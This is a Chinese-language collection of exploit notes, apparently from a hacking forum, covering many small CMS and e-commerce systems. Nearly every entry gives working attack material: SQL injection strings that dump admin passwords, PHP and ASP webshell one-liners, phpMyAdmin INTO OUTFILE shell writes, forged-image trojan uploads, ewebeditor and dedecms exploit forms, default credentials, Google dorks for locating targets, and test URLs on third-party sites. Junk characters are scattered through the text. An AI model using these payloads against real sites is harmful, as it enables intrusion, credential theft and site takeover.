启航企业建站系统 cookie注入漏洞通杀所有版本
6 {5 ]) d4 f \9 q# m# a. t9 G$ @" X
直接上exploit:
$ s% N2 N/ ^+ O2 M1 C; k; xjavascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
* B7 _6 D# Z, _( Q# p4 s/ Vtest:http://www.tb11.net/system/xitong/shownews.asp?id=210
" O) H, u/ a( }5 z, X( f+ n& O' _: G--------------------------------------------------------------------------------------------------------------------------------------------------------------------------( R" z( K; j+ @% ?2 \1 ^
Asprain论坛 注册用户 上传图片就可拿到webshell
) y s) a5 r/ O3 N; \) m' o8 Q7 d0 V1 C: W+ h# s
Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
; n! W% [7 X p) E1.txt存放你的一句话马 如:<%execute(request("cmd"))%>
& l* S w; S" b( d3 H2.gif 为一小图片文件,一定要小,比如qq表情图片
6 X- [2 X/ l6 Y; [6 g3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用
8 K U+ x+ D+ f8 E4 j* s, X4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
- g! o1 ~1 p' ^+ B4 g6 v, q+ G8 L5.q.asp;.gif. T/ G' c$ w. u/ s2 |+ E
google:Powered by Asprain
; w* \% G5 t- L( M$ Q( O/ h, ^--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1 k& @6 {& g# ?( ]/ m' W$ Y
% i* d7 j9 k$ Q. X0 }ShopNum1全部系统存在上传漏洞。$ h W8 E# X1 q9 ^) }* m9 K
7 ?: P, f6 O1 i, H! v4 V
首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。 E* }5 s4 x7 w9 H% L- u5 F; |* _3 \
按说明 提示登录后台。。
' S* G8 {/ J( x; b, R在后台功能页面->附件管理->附件列表$ h: s4 n/ g: \( C% g' d4 \
可以直接上传.aspx 后缀木马
6 ] O7 C; c# Khttp://demo.shopnum1.com/upload/20110720083822500.aspx
: W0 P2 ]; O- j+ X/ R0 B--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0 S4 G# a( ?* p' b) i" t" c g
# n1 v5 c' I7 M$ |% \; A牛牛CMS中小企业网站管理系统 上传漏洞 Q; k% J! J5 x. p* \# n
( e3 _& l: w) _牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
3 c) T/ ?6 x" H3 U: ^1 w后台:admin/login.asp2 D# T i" G- H: U6 F
ewebeditor 5.5 Nday' U% {# w: O9 R3 x8 T5 a
exp:- N1 v, P' [8 t
<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
) `) U; n7 }& A- H6 L<input?type=file?name=uploadfile?size=100><br><br>? f$ N0 L5 [$ f
<input?type=submit?value=upload>?
& r$ Z8 F4 |" i; Y1 c</form> C5 P; E/ j$ P' c: S# |, v9 ?
ps:先上传小马.
. L6 a2 M6 v/ P- T8 g: Zinurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏
$ a- h, g( |2 P- k( Q6 B, Q
E: W/ _# ^4 w- n Y( k; t4 [4 N# z2 k--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# G8 g C- S" e) R3 V4 |; j: ]! {' k# {
YothCMS 遍历目录漏洞$ ]4 B' g0 |2 }- u& X/ j" f, ^
3 M. Q$ e( @. H5 E: X, P* w
优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
* n" b" _* w- k8 p& p6 j( d: l- j默认后台:admin/login.asp+ T" V3 z# C" K( z% ]7 Q
遍历目录:
" R3 i/ D0 j& C5 [7 }ewebeditor/manage/upload.asp?id=1&dir=../
5 {* @$ g9 z" b& x, ndata:
9 N3 x9 c% o" {4 I8 ]0 {" t# _( Lhttp://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa
0 |: K* o- J. ?; J) x: A/ d' ?$ Q# O) S--------------------------------------------------------------------------------------------------------------------------------------------------------------------------% `3 \! \7 S% j, E/ H
3 u! L& O, t% T- Y/ `
Net112企业建站系统 1.0
, J, D2 o8 Q' V* c6 V% t
& k4 {0 R/ d$ P- b源码简介:
( M4 S" `: q7 H# d4 \Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。4 v6 N7 ?- y- j3 Y
添加管理员:
8 A; v5 U2 w4 }+ d) Rhttp://www.0855.tv/admin/admin.asp?action=add&level=2
; X1 y! r) g+ @: y1 R/ }3 z其实加不加都不是很重要,后台文件都没怎么作验证。3 S) B7 Y! e8 e
上传路径:
2 c q3 d$ G! n1 S5 ohttp://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200
" {! q7 M, r8 y; y& ]) ~4 Yhttp://www.0855.tv/inc/Upfile.asp?Stype=2# Z# @ {' T( X
怎么利用自己研究。
% p, r2 H# Y7 D& J: w, x7 h遍历目录:9 e7 @7 t- k! \
http://www.0855.tv/admin/upfile.asp?path=../..6 K7 y9 h/ I7 \5 O
如:4 a3 j0 A* W$ S! o
http://www.0855.tv/admin/upfile.asp?path=../admin
* k$ B* T' @! @http://www.0855.tv/admin/upfile.asp?path=../data
9 I" L, ^# E H0 l--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( J( B9 x9 G4 _3 `1 k
& o: W3 ~0 }# y4 C5 `3 S8 A易和阳光购物商城通杀 上传漏洞
/ p) ~' M' d- `' ~' G, B! ^/ B# F" _
前提要求是IIS6.0+asp坏境。& E; z6 D8 Q4 x! {0 S1 h
漏洞文件Iheeo_upfile.asp ! K3 {0 Q0 [1 I2 k( {
过滤不严.直接可以iis6.0上传" M7 {' ^1 b: Z
把ASP木马改成0855.asp;1.gif) k& p+ Z8 ~$ V2 `
直接放到明小子上传" a. u8 l; `/ E3 Q' x6 P+ P* k6 z
Google搜索:inurl:product.asp?Iheeoid=; G; A% V/ O8 ]: L! s9 C
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------3 Z( g. k" W1 Z: N, C. b
" o. ?2 G9 a7 V& K3 ephpmyadmin后台4种拿shell方法
+ g3 K9 {/ f- a; x5 ?( {9 S5 } }- S! x- ` {1 b
方法一:
4 W+ U' g" m& Y+ OCREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
% W+ o( j; O- i! I& IINSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
2 v; Z* |0 g* A' J4 ESELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
, b7 q% N$ ]% _1 h3 X----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
5 {# t. @ x* D( B5 F6 u2 O9 A- X! V7 V一句话连接密码:xiaoma
* s4 j, O3 I/ N7 ^9 {方法二:/ T# ?- s' n/ S. T$ a7 h" ^
Create TABLE xiaoma (xiaoma1 text NOT NULL);* f' w6 o+ a) g5 Q: F7 E: a
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
. R8 o2 V6 C3 G/ b+ u; D9 tselect xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
7 c7 t7 r8 q* @- h7 B1 b6 f7 cDrop TABLE IF EXISTS xiaoma;
: ?, ~" U |( J3 W ~& A! `方法三:
( E4 n+ T0 e( U0 v6 a$ A! ~读取文件内容: select load_file('E:/xamp/www/s.php');- d- W2 U, k4 F; p5 F3 x
写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
, N, e& h; y9 I* z, _7 \+ ? Vcmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'+ I* A" |8 K8 W6 z, O
方法四:
+ o+ V8 |, f+ v% R- sselect load_file('E:/xamp/www/xiaoma.php');
0 g/ G& L# _% iselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php', x0 v1 e A- d2 T ^8 \
然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir) d" }( o" c9 p( E. n
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------2 i7 a J, s3 @4 D! B
t! x" T+ y2 ?' r% e8 d; O' c传信网络独立开发网站源码0day漏洞! c' H& B) `- n2 u1 x5 J0 ~/ \
5 K/ u9 j3 M3 b0 ~) G; l后台system/login.asp' [! M' P$ l) N1 z; _' K# a
进了后台有个ewebeditor0 ?0 t; z: g- ?* |- k! Q4 g
Google 搜索inurl:product1.asp?tyc=
, m1 }& m: S, q/ V% b4 {编辑器漏洞默认后台ubbcode/admin_login.asp
5 b0 t& e) p4 `数据库ubbcode/db/ewebeditor.mdb
0 G* j6 ]* E" E2 y( C4 T4 y默认账号密码yzm 111111
+ G8 ^+ E2 C' q% a# C; T* B t( w0 H% Q. n6 W
拿webshell方法; h2 J( Q8 }3 c8 {) l+ U- |8 `# a
登陆后台点击“样式管理”-选择新增样式 % h5 P! U: g, }2 l: ]* `3 m' p6 L; s
样式名称:scriptkiddies 随便写
% R5 X2 Y0 g: y0 ]8 O' o路径模式:选择绝对路径 # t- P5 s* |% d
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
& C' `) v4 k% c/ @( A% G图片类型比如就是我们要上传的ASP木马格式
2 M/ I6 n7 J$ C4 C) U上传路径:/ n6 {4 ^3 {2 C" k$ S4 Y
图片限制:写上1000 免的上不了我们的asp木马
) p4 U8 [. |! o上传内容不要写
' _' I; w" G" U2 p可以提交了
) b7 F' y( T" x样式增加成功!
4 P! f3 s' t) n返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏 $ e Z; ~5 \' C# G4 O. Q1 k9 K6 |. k
按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置0 C$ D3 B$ R9 X) v
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
; C( T% W( u1 m% ~) [0 I& J上ASP木马 回车 等到路径
3 S; Y9 Q: m- a# _' L- }/ B; x* x8 Z" E3 v/ M/ \
后台:system/login.asp- X0 X$ W1 F7 l$ o7 y- \5 s; k
Exp:
; N1 {1 W) |8 ]( l* l% S Land 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master; \! m+ i; K5 m5 v0 \/ t
测试:7 K* k5 @( @( i2 c& M
http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master8 n( p& N7 O) J$ z) v
http://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
% }! ~3 k( j4 \--------------------------------------------------------------------------------------------------------------------------------------------------------------------------/ y5 F5 Q* a' v3 ?5 X, ~- M
' C2 v# a% Q! ]% `$ C, i; B* k
foosun 0day 最新注入漏洞- l& o3 v( K9 h! P
2 d5 U3 A: s u5 V: u2 L( D漏洞文件:www.xxx.com/user/SetNextOptions.asp. D* x% T9 V. Y6 Y! p6 Y
利用简单的方法:
2 B$ } g7 y1 l$ ]暴管理员帐号:
5 i9 I% _ q) @) h+ l- ohttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin7 `" b& W1 q$ H( H% z' y0 d$ d `2 j2 D
暴管理员密码:8 Q, L m5 t4 o5 c8 [8 d- V7 k5 O
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,* ?& n: L3 a) B. V- q3 F' t
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------* e( s7 M: e/ Z
* C6 O# ~' e; o7 C) X- d! U
网站程序的版权未知!
* D9 T9 I4 _ `) c5 m) }& ] s* _) o9 x; L |1 _
默认网站数据库:
; b% p& T& i- _* Zwww.i0day.com/data/nxnews.mdb- m5 p/ K# a) V, Y) e2 X
ewebeditor 在线编辑器:
* c$ l/ z" c. B' G7 A; O编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb
3 r8 B' w0 o. _% R: M登录地址:ewebeditor/admin_login.asp0 H8 L. H9 s9 w1 W8 W/ y7 v2 t8 o
默认密码:admin admin1 A1 a5 b ^/ V+ k) b, R
登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
* @8 K3 p6 q2 [1 d ?; ^; F5 ?9 p7 y8 @! z' r8 X
Sql注入漏洞:
, @) X5 ?; D6 v- R1 G8 @http://www.i0day.com/detail.asp?id=12
' }9 M' ~( R* N8 m1 q# ^0 K% H. Mexp:# w; ~/ M2 n1 e3 d# U
union select 1,admin,password,4,5,6,7,8 from admin
" A f: I& b$ J; j爆出明文帐号/密码
: f A& r4 U5 {% a! n5 r" x: }- F- `* z5 b* w0 r F
上传漏洞:/ L8 z$ C7 ~- t) l+ E1 E$ t
后台+upfile.asp1 t1 c# e( X" Z2 r% C
如:. O0 ^. K+ A4 j* ~; x
http://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。
# Y, E; N% P! Y, R( J' Ashell的地址:网址+后台+成功上传的马
9 h! a6 s0 D) {: Z2 C" wgoogle:inurl:news.asp?lanmuName=: F# \$ H+ M1 [+ d3 g* B
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" G% Z9 V2 | u! y) Y+ p" w" ]% f
6 i8 t% j/ D* N+ N4 Idedecms最新0day利用不进后台直接拿WEBSHELL
( J) H+ b \ w/ q
, M8 D9 H7 u: G t# J$ b6 }( R拿webshell的方法如下:
" b0 ^5 b8 c+ R! l: S1 |网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell. H# V/ @# h' O3 G5 o
前题条件,必须准备好自己的dede数据库,然后插入数据:0 m3 {( {0 W& ^0 b$ d
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}'); 4 A% G9 s( `. R
0 |' C( |0 ?2 [, _3 }# g. ~再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。8 I2 m9 U8 k9 D" a6 m( J
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">/ I% j3 A( C% f$ f! ~) S& q
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br /> ~- n/ G6 O5 W ]3 `
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
' K6 j$ Q8 J' }3 u9 I<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
0 a2 p' ?4 C% F' V4 c8 q<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
w" i% w3 X7 |& f6 z<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
- y+ Z$ B8 e6 L8 q9 z. `<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />4 S0 B/ I( ^% E$ Y3 q
<input type="text" value="true" name="nocache" style="width:400">
5 o- x. N" ~$ b9 t5 p, j<input type="submit" value="提交" name="QuickSearchBtn"><br />
+ E. _2 k. Y1 h" Y# j1 O8 }</form> u V n9 W' Z a
<script>
% N% r7 f& A ?% wfunction addaction()
; I" m6 Y' C; T7 B( P& {3 K' n{
2 R+ @; C5 c1 T. mdocument.QuickSearch.action=document.QuickSearch.doaction.value;
. P @* y4 [: C}
3 F# m6 F( k8 g! x0 K! T</script>! K) y8 j; {# x/ d1 P4 e0 ~
-----------------------------------------------------------------------------------------------------------------------------------------------
$ v; J* g: L9 O) ]
! y8 o9 z0 w" d* w7 m, a: C; Kdedecms织梦暴最新严重0day漏洞" G# n0 z# ~3 Y c4 o1 t; w+ B4 [
bug被利用步骤如下:
8 L% y g6 b( @) w$ Qhttp://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root& N8 a; C. o4 _ ~/ h h
把上面{}上的字母改为当前的验证码,即可直接进入网站后台。
5 W: Y& t8 c$ n6 F3 g-------------------------------------------------------------------------------------------------------------------------------------------
]( K) l* g: t( g5 m6 a. P6 u# \4 Q6 y* _
多多淘宝客程序上传漏洞
8 {/ Y+ s+ \/ _. R; [漏洞页面:
5 y& o; l+ y/ r# y! q" eadmin\upload_pic.php
' ^9 j, X4 Z0 S, c! F) P传送门:
7 y- a2 V9 A+ a2 ~http://www.www.com/admin/upload_pic.php?uploadtext=slide1
6 j9 y& l3 V$ T- l! EPS:copy张图片马 直接 xxx.php 上传抓包地址! Q) ^$ ] S3 t4 g
------------------------------------------------------------------------------------------------------------------------------------------------------
: ^' @. }7 w% B: C7 n9 P' T$ _3 Q! J
1 h0 p: W& r' j# ?无忧公司系统ASP专业版后台上传漏洞
# Z2 k* s( k) ?: \& m) K漏洞文件 后台上传
8 M# W: k+ M3 e8 N8 nadmin/uploadPic.asp
0 c% P) v4 H: b* z) e7 Y' x漏洞利用 这个漏洞好像是雷池的
& J: a; I4 [. O& Q" v* Ghttp://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=16 N( ^+ O, h& l# u( J0 l
等到的webshell路径:
8 g- x1 Y' {; F* w/UploadFiles/scriptkiddies.asp;_2.gif
, ^' D5 e( w) T0 B' b---------------------------------------------------------------------------------------------------------------------------------------------------/ n: w* n% h* [) O1 B
& p# C7 o2 E8 f$ O% h% ]5 n住哪酒店分销联盟系统2010
' R8 Z7 O( _- r( QSearch:# [4 _' t8 V, ^' D0 h4 ]
inurl:index.php?m=hotelinfo
5 A5 B. Y/ C( nhttp://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin) x; j4 ]9 H5 Q
默认后台:index.php?m=admin/login
( f6 |6 ^0 f6 N* r--------------------------------------------------------------------------------------------------------------------------------------------------3 a$ Q# t2 t, L
8 M: J* Z* i' u; ], linurl:info_Print.asp?ArticleID=9 ?/ u9 Z. b& E7 X& x9 ?% @$ C& e
后台 ad_login.asp& Z& N7 H; X L; i0 X. ]. c- l$ c7 _# m
爆管理员密码:9 U8 f, f, @9 o" P5 i2 R% F! { U
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin# K6 B6 I8 Z4 z! L, r, M
------------------------------------------------------------------------------------------------------------------------------------------------------------
w$ m& L& C% M: s2 M; ?( S& j0 R
搜索框漏洞!
8 R! @ `( u* @. i2 {%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
# ^% V# j& d% ?0 m/ s. U--------------------------------------------------------------------------------------------------------------------------------------------------------
" s& V* p1 _/ j
# W1 K# |; i6 q; _! L* k1 ~1 f关键字:# C0 \# w' s0 Z
inurl:/reg_TemletSel.asp?step=2
; g5 D0 V- ` b" q/ Q i或者. U9 X0 g4 @3 d
电子商务自助建站--您理想的助手
8 S+ ^( V8 G4 D8 _+ D# {2 h9 i-------------------------------------------------------------------------------------------------------------------------------------------------
) `9 ?+ I+ b1 W: b I( b; Y
1 ^1 i# K& O9 G1 @iGiveTest 2.1.0注入漏洞( C7 o4 y2 `# `% d
Version: <= 2.1.04 g) E7 n* `, B/ y2 k" M
# Homepage: http://iGiveTest.com// `+ x3 v; P, ]) W$ l# F2 }2 e
谷歌关键字: “Powered by iGiveTest”
$ D; S( Z7 P5 Y& ~ k* A8 y* Q* a随便注册一个帐号。然后暴管理员帐号和密码
& i' F/ w) R, k$ ^8 @8 T! s# Qhttp://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
5 |5 F Q5 N& {' |' C$ K------------------------------------------------------------------------------------------------------------------------------------------------# N9 T+ H/ d1 V6 D3 G! N" t- t" ]3 r# J
$ k) g% H4 [( P8 }' [CKXP网上书店注入漏洞
& q1 o, u- T/ F* C工具加表:shop_admin 加字段:admin1 W: }) O" O% X0 }
后台:admin/login.asp 9 y6 t* a% c Z N0 h6 G
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
8 y6 o, L% l R6 O6 H7 |( @6 Oinurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
" F ?5 J6 f5 Q- p. u6 `7 @--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
3 V5 v b7 F2 D A- J
$ y& q( ?/ n7 R# D. Z段富超个人网站系统留言本写马漏洞
. I+ V4 u2 J# L# i2 S, w源码下载:http://www.mycodes.net/24/2149.htm# T1 U( Z6 A* Q9 r
addgbook.asp 提交一句话。
1 Y: v" U! D3 ~* V+ r( `6 d: e连接: http://www.xxxx.tv/date/date3f.asp) l2 ?# ]3 V- `
google:为防批量,特略!
2 { `* o! ?, t6 b+ _' t-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4 g8 S4 W+ D7 M' A1 c5 ], h, T u5 l- @
智有道专业旅游系统v1.0 注入及列目录漏洞
) k5 c2 d A% Q3 `- z9 b) G默认后台路径:/admin/login.asp
- ^5 x5 V" b; K. F3 C+ I默认管理员:admin
! U( [% F! c$ ]6 a7 K默认密码:1234564 ]9 y1 W. ?! i! f$ H1 U, C
SQL EXP Tset:
8 ~& d1 `% y6 X3 `http://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
6 E! y4 L6 H3 u. E! U------------------------------------------------------------------------------------------------------------------------------------------------------------------------% _3 [9 e5 K2 n8 F' |& z
+ }5 G u, z d7 P6 J; t. Lewebeditor(PHP) Ver 3.8 本任意文件上传0day
% }! w* ~% Y! c. @; v: Z8 ~2 gEXP:
2 W& x! ^& t5 u5 ~0 ]. Y( I5 a3 ~<title>eWebeditoR3.8 for php任意文件上EXP</title>
0 q$ {0 X5 x: ^8 j+ R<form action="" method=post enctype="multip
' }( T- z1 z9 Q2 t$ Rart/form-data">
+ H# Z- r+ p0 V. M% S7 l8 c<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000"> K0 k. k2 M( V0 p( v; i9 V" W
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
9 d( u7 Y+ f _: K<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
* @; ]! E, q2 F! |, w0 M4 Tfile:<input type=file name="uploadfile"><br>
8 Y. o6 ]+ M1 F<input type=button value=submit onclick=fsubmit()> 1 |" `$ [- L1 k; |) l+ ~
</form><br>
/ M3 e( }! J' o+ [2 H7 h+ G, w0 K<script>
- L& {; d1 @& O" X& m& S ~+ d9 Ofunction fsubmit(){
7 V' d4 {( Q7 cform = document.forms[0]; ( ^% M9 f7 G# H1 R3 k6 E" }5 j4 c
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en''; : ^/ W& e( h7 |! ?# `& J6 j
alert(form.action); ~3 k( l/ v- K. z5 b, H1 `
form.submit();
1 Y. O- O* U, r& ` d} 3 f# @( O. `) r- M# c9 `& D3 r
</script>
2 l9 P+ _; H# z0 j+ R+ k/ D注意修改里面ewebeditor的名称还有路径。
1 h5 Z! j& Z7 _( F" W- Y---------------------------------------------------------------------------------------------------------------------------------------------------------------------------6 W2 w4 {1 s# C; H) z4 Z9 a8 t
5 _2 W3 Y% y9 `: B/ t提交’时提示ip被记录 防注入系统的利用- F& H4 J6 A% v( H$ X1 z
网址:http://www.xxx.com/newslist.asp?id=122′
- Q: f, H; F% P/ S提示“你的操作已被记录!”等信息。& a% ~. Q7 S) Y
利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。) e o8 c5 U' C4 y Z, t
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------" k. i$ J, ~ W) f" ?4 N: ~
0 m' h3 V8 ~, D: S& u: \( E& q9 R
西部商务网站管理系统 批量拿shell-0day2 \" N4 O9 |, z# l0 l* I$ z
这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
" K/ m' w. s, a1 ~( |$ [% \9 [1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛+ l" W) o4 z% G% _
2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合0 ]) Y6 V% p! |5 u
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
0 [; W0 q! J4 N---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
G; \' M4 e0 A' s, y. ?5 W, t( p$ B' @6 r
JspRun!6.0 论坛管理后台注入漏洞
5 V1 J) l. p* T$ u
J6 j* ]( t: x; R2 ?SEBUG-ID:20787 发布时间:2011-04-30 影响版本:& h- V8 |' g; {! N/ s# f. c, m8 ^
JspRun!6.0
6 D! ~4 j) M4 _, u1 ?8 h漏洞描述:
1 H* c1 f1 ?) ]% }7 {7 A1 B- }2 dJspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。
2 h* M% i; S" P' Z& A7 w' u2 s" ~1 b在处理后台提交的文件中ForumManageAction.java第1940行5 q: ?$ W. \0 l) Y$ @* \
String export = request.getParameter("export");//直接获取,没有安全过滤
! e8 ^/ ~ A( V: T3 fif(export!=null){
6 ^& ?: H$ K' U- f" c1 f7 d" qList> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...
$ R6 a5 f+ H* q4 ~- l/ U9 `7 bif(styles==null||styles.size()==0){5 n3 C* L* L8 ~5 @, I
<*参考 L2 ^. J5 E% B o
nuanfan@gmail.com
8 P' C6 {) a7 K9 a& v% C*> SEBUG安全建议:- Y! J6 n5 S( y' W$ F& p9 P
www.jsprun.net
, p; s8 W* C' V3 w- X(1)安全过滤变量export
1 a Z: e) q- y9 i8 O(2)在查询语句中使用占位符
0 W% R+ i% _$ W7 f/ \------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2 h1 }. |* j& N: D; U# G8 c
+ K1 T9 u0 T4 g$ x4 a8 A: H乌邦图企业网站系统 cookies 注入4 c1 {" ^3 ^/ e$ }5 s1 f5 {) R
3 A) C! v2 w2 G4 y5 ?. C" M$ ]" I' X
程序完整登陆后台:/admin/login.asp k1 w; R( l8 ~& v2 }$ ^) X' p1 Q! ^( L
默认登陆帐号:admin 密码:admin888/ c- H) q; l: e( E* y
语句:(前面加个空格)
% G$ k' v9 [ {! t! kand 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
% Q, y" V# ^$ t9 R- `6 L- Q或者是16个字段:
3 ?8 M( x- Z% ~+ y4 Oand 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin8 s% S- E0 Y% ^
爆不出来自己猜字段。
H; n0 S( |0 H% Y! r! l9 B( x2 u注入点:http://www.untnt.com/shownews.asp?=88' Y2 ?; _) l/ r6 l- Z
getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
( T E, X/ E |8 r0 r4 d' r关键字: C/ q' k5 |1 W% c" E) k
inurl:shownews?asp.id= v& n/ H1 `& Y* b0 }- w
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
& i7 q8 c% ]3 q2 |/ X: ]8 m2 f! D+ K" ^
CKXP网上书店注入漏洞
8 y" e0 O( u6 s$ Z6 P2 {
* Z/ F& N' t$ K( W" C. q: W工具加表:shop_admin 加字段:admin
) g6 j7 {: h( \8 ?% I8 q后台:admin/login.asp
0 s( _, H' M. f3 `" M登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/' p3 T7 d/ d6 }: H1 X% ]
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
4 y& b& z3 H1 z S% ~# ?---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
) Q3 ^1 L- z% n( I
e. j o( a, h4 a. i$ PYxShop易想购物商城4.7.1版本任意文件上传漏洞" z* D/ j( R- d+ p& G
4 p4 N2 W- _* q1 H' {, j$ \
